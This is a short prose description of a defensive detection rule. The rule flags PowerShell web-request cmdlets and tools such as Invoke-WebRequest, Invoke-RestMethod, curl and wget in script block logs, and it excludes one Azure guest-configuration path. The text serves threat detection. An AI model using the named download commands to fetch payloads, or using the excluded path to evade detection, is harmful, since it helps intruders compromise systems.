This detection rule identifies the execution of web request commands and cmdlets in PowerShell scripts, specifically focusing on the use of cmdlets like Invoke-RestMethod, Invoke-WebRequest, and variations of web requests such as curl and wget. It harnesses Script Block Logging feature in Windows to capture relevant PowerShell activities. The rule is designed to detect potential misuse of these commands which are often leveraged in attack scenarios such as downloading malicious payloads. The criteria for triggering the alert are based on specific command patterns found in script block logs, while excluding legitimate cases that stem from standard system operations, specifically paths that begin with 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'. The overall goal is to enhance monitoring capabilities around potential attacks that utilize web requests in PowerShell. Security teams should pay particular attention to the execution of these commands, especially in environments where script block logging is enabled, as it can indicate nefarious activity leading to system compromise or unauthorized data exfiltration.